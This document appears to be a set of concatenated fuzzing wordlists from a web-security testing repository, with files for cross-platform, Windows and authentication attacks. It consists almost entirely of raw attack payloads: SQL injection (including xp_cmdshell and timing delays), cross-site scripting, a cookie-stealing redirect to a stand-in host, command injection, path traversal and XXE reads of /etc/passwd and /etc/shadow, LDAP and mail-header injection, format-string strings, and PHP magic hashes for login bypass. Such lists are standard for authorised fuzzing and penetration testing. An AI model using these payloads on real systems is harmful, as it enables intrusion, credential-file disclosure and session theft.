%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
%s%p%x%d
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
&
& id
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
'
'%20OR
&id
<
<
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
<!--#exec%20cmd="/usr/bin/id;-->
<>"'%;)(&+
<script>alert(document.cookie);<script>alert
<script>alert(document.cookie);</script>
";id"
'
' (select top 1
' --
' ;
' UNION ALL SELECT
' UNION SELECT
' or ''='
' or '1'='1
' or '1'='1'--
' or 'x'='x
' or (EXISTS)
' or 0=0 #
' or 0=0 --
' or 1 in (@@version)--
' or 1=1 or ''='
' or 1=1--
' or a=a--
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
'%20or%201=1
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
'';!--"<XSS>=&{()}
') or ('a'='a
'--
'; exec master..xp_cmdshell
'; exec xp_regread
'; waitfor delay '0:30:0'--
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
';shutdown--
'><script>alert(document.cookie);</script>
'><script>alert(document.cookie)</script>
'hi' or 'x'='x';
'or select *
'sqlattempt1
'||UTL_HTTP.REQUEST
'||Utl_Http.request('http://<yourservername>') from dual--
(
(')
(sqlattempt2)
)
))))))))))
*
*'
*'
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
+
+%00
,@variable
-
--
--';
--sp_password
-1
-1.0
-2
-20
-268435455
..%%35%63
..%%35c
..%25%35%63
..%255c
..%5c
..%bg%qf
..%c0%af
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
..%u2215
..%u2216
../
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow%00
..\
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
/
/%00/
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%2A
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
/'
/'
/,%ENV,/
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/.../.../.../.../.../
/../../../../../../../../%2A
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../bin/id|
/..\../..\../..\../..\../..\../..\../boot.ini
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
//
//*
/etc/passwd
/etc/shadow
/index.html|id|
0
0 or 1=1
00
0xfffffff
1
1 or 1 in (@@version)--
1 or 1=1--
1.0
1; waitfor delay '0:30:0'--
1;SELECT%20*
1||Utl_Http.request('http://<yourservername>') from dual--
2
2147483647
268435455
65536
:response.write 111111
;
; ping 127.0.0.1 ;
;/usr/bin/id\n
;echo 111111
;id
;id;
;id\n
;id|
;ls -la
;system('/usr/bin/id')
;system('cat%20/etc/passwd')
;system('id')
;|/usr/bin/id|
<
< script > < / script>
<!
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
</foo>
<<
<<<
<<script>alert("XSS");//<</script>
<>"'%;)(&+
<?
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC="  javascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=`javascript:alert("'XSS'")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
<IMG%20SRC='javasc ript:alert(document.cookie)'>
<IMG%20SRC='javascript:alert(document.cookie)'>
<foo></foo>
<name>','')); phpinfo(); exit;/*</name>
<script>alert("XSS")</script>
<script>alert(document.cookie)</script>
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<xss><script>alert('XSS')</script></vulnerable>
<youremail>%0aBcc:<youremail>
<youremail>%0aCc:<youremail>
<youremail>%0d%0aBcc:<youremail>
<youremail>%0d%0aCc:<youremail>
=
='
=--
=;
>
?x=
?x="
?x=>
?x=|
@'
@'
@*
@variable
A
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
FALSE
NULL
PRINT
PRINT @@variable
TRUE
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
[']
[']
\
\";alert('XSS');//
\"blah
\'
\'
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
\0
\00
\00\00
\00\00\00
\0\0
\0\0\0
\\
\\'/bin/cat%20/etc/passwd\\'
\\'/bin/cat%20/etc/shadow\\'
\\/
\\\\*
\\\\?\\
\n/bin/ls -al\n
\n/usr/bin/id;
\n/usr/bin/id\n
\n/usr/bin/id|
\nid;
\nid\n
\nid|
\nnetstat -a%\n
\t
\u003C
\u003c
\x23
\x27
\x27UNION SELECT
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
\x3C
\x3D \x27
\x3D \x3B'
\x3c
^'
^'
`
`/usr/bin/id`
`dir`
`id`
`perl -e 'print ".%p" x 80'`%n
`ping 127.0.0.1`
a);/usr/bin/id
a);/usr/bin/id;
a);/usr/bin/id|
a);id
a);id;
a);id|
a)|/usr/bin/id
a)|/usr/bin/id;
a)|id
a)|id;
a;/usr/bin/id
a;/usr/bin/id;
a;/usr/bin/id|
a;id
a;id;
a;id|
http://<yourservername>/
id%00
id%00|
insert
like
limit
null
or
or 0=0 #
or 0=0 --
or 1=1--
or%201=1
or%201=1 --
response.write 111111
something%00html
update
x' or 1=1 or 'x'='y
x' or name()='username' or 'x'='y
xsstest
xsstest%00"<>'
{'}
|/usr/bin/id
|/usr/bin/id|
|id
|id;
|id|
|ls
|ls -la
|nid\n
|usr/bin/id\n
||
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
||/usr/bin/id;
||/usr/bin/id|
}
================================================
FILE: attack/all-attacks/all-attacks-win.txt
================================================
# a wide sample of malicious input for windows targets
A
TRUE
FALSE
0
00
1
-1
1.0
-1.0
2
-2
-20
65536
268435455
-268435455
2147483647
0xfffffff
NULL
null
\0
\00
< script > < / script>
%0a
%00
+%00
\0
\0\0
\0\0\0
\00
\00\00
\00\00\00
$null
$NULL
`dir`
\nnetstat -a%\n
\"blah
|dir|
";id"
dir%00
dir%00|
|dir
|dir|
|/bin/ls -al
?x=
?x="
?x=|
?x=>
/boot.ini
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
../../boot.ini
/../../../../../../../../%2A
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
../../../../../../../../conf/server.xml
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
%0d%0aX-Injection-Header:%20AttackValue
!@#0%^#0##018387@#0^^**(()
%01%02%03%04%0a%0d%0aADSF
/,%ENV,/
<!--#exec%20cmd="dir"-->
<!--#exec%20cmd="dir"-->
%
#
*
}
;
/
\
\\
\\/
\\\\*
\\\\?\\
<
<
<
<
<
<<
<<<
|
||
`
-
--
*|
^'
\'
/'
@'
(')
{'}
[']
*'
#'
!'
!@#$%%^#$%#$@#$%$$@#$%^^**(()
%01%02%03%04%0a%0d%0aADSF
\t
"\t"
#xD
#xA
#xD#xA
#xA#xD
/%00/
%00/
%00
<?
%3C
%3C%3F
%60
%5C
%5C/
%7C
%00
/%2A
%2A
%2C
%20
%20|
%250a
%2500
../
%2e%2e%2f
..%u2215
..%c0%af
..%bg%qf
..\
..%5c
..%%35c
..%255c
..%%35%63
..%25%35%63
..%u2216
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
something%00html
'
/'
\'
^'
@'
{'}
[']
*'
#'
">xxx<P>yyy
"><script>"
<script>alert("XSS")</script>
<<script>alert("XSS");//<</script>
<script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
'><script>alert(document.cookie);</script>
\";alert('XSS');//
%3cscript%3ealert("XSS");%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
<script>alert(document.cookie);</script>
<script>alert(document.cookie);<script>alert
<xss><script>alert('XSS')</script></vulnerable>
<IMG%20SRC='javascript:alert(document.cookie)'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='javasc ript:alert(document.cookie)'>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="  javascript:alert('XSS');">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
'';!--"<XSS>=&{()}
'
"
#
-
--
' --
--';
' ;
= '
= ;
= --
\x23
\x27
\x3D \x3B'
\x3D \x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
';shutdown--
<>"'%;)(&+
' or ''='
' or 'x'='x
" or "x"="x
') or ('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
"' or 1 --'"
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
" or 1=1 or ""="
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
'%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
'
'--
' or 1=1--
1 or 1=1--
' or 1 in (@@version)--
1 or 1 in (@@version)--
'; waitfor delay '0:30:0'--
1; waitfor delay '0:30:0'--
'||Utl_Http.request('http://<yourservername>') from dual--
1||Utl_Http.request('http://<yourservername>') from dual--
xsstest
xsstest%00"<>'
</foo>
<foo></foo>
))))))))))
../../../../../../../../../../boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
../../../../../../../../../../windows/win.ini
..\..\..\..\..\..\..\..\..\..\windows\win.ini
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
| ping -i 30 127.0.0.1 |
| ping -n 30 127.0.0.1 |
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
; ping 127.0.0.1 ;
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
;echo 111111
echo 111111
response.write 111111
:response.write 111111
http://<yourservername>/
<youremail>%0aCc:<youremail>
<youremail>%0d%0aCc:<youremail>
<youremail>%0aBcc:<youremail>
<youremail>%0d%0aBcc:<youremail>
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
# known cross platform source Code, file disclosure attack patterns - append after file or dir path
%70
.%E2%73%70
%2e0
%2e
.
\
?*
%20
%00
%2f
%5c
count(/child::node())
x' or name()='username' or 'x'='y
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
%00
NULL
null
'
"
;
<!
-
=
+
"
&
!
|
<
>
"><script>alert(1)</script>
%0d
%0a
%7f
%ff
-1
other
%s%p%x%d
%99999999999s
%08x
%20d
%20n
%20x
%20s
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
`perl -e 'print ".%p" x 80'`%n
================================================
FILE: attack/all-attacks/all-attacks-xplatform.txt
================================================
!'
!@#$%%^#$%#$@#$%$$@#$%^^**(()
!@#0%^#0##018387@#0^^**(()
"><script>"
">xxx<P>yyy
"\t"
#
#'
#'
#xA
#xA#xD
#xD
#xD#xA
$NULL
$null
%
%00
%00/
%01%02%03%04%0a%0d%0aADSF
%0a
%20
%20|
%2500
%250a
%2A
%2C
%2e%2e%2f
%3C%3F
%5C
%5C/
%60
%7C
'
";id"
(')
*
*'
*'
*|
+%00
-
--
-1
-1.0
-2
-20
-268435455
..%%35%63
..%%35c
..%25%35%63
..%255c
..%5c
..%bg%qf
..%c0%af
..%u2215
..%u2216
../
..\
/
/%00/
/%2A
/'
/'
0
00
0xfffffff
1
1.0
2
2147483647
268435455
65536
;
< script > < / script>
<?
?x=
?x="
?x=>
?x=|
@'
@'
A
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
FALSE
NULL
TRUE
[']
[']
\
\"blah
\'
\'
\0
\00
\00\00
\00\00\00
\0\0
\0\0\0
\\
\\/
\\\\*
\\\\?\\
\t
^'
^'
`
id%00
id%00|
null
something%00html
{'}
{'}
|
}
================================================
FILE: attack/authentication/README.md
================================================
php_magic_hashes.fuzz.txt - See, https://www.whitehatsec.com/blog/magic-hashes/
"the following “magic” strings are substantially more likely to evaluate to true when hashed given a completely random hash..."
================================================
FILE: attack/authentication/php_magic_hashes.fuzz.txt
================================================
00e00099
00e05651056780370631793326323796
00e1839085851394356611454660337505469745
00e2521569708250889666329543741175098562
00e38549671092424173928143648452
00e4706040169225543861400227305532507173
0e015339760548602306096794382326
0e01697014920826425936632356870426876167
0e074025
0e07766915004133176347055865026311692244
0e251331818775808475952406672980
0e266546927425668450445617970135
0e316321729023182394301371028665
0e34042599806027333661050958199580964722
0e462097431906509019562988736854
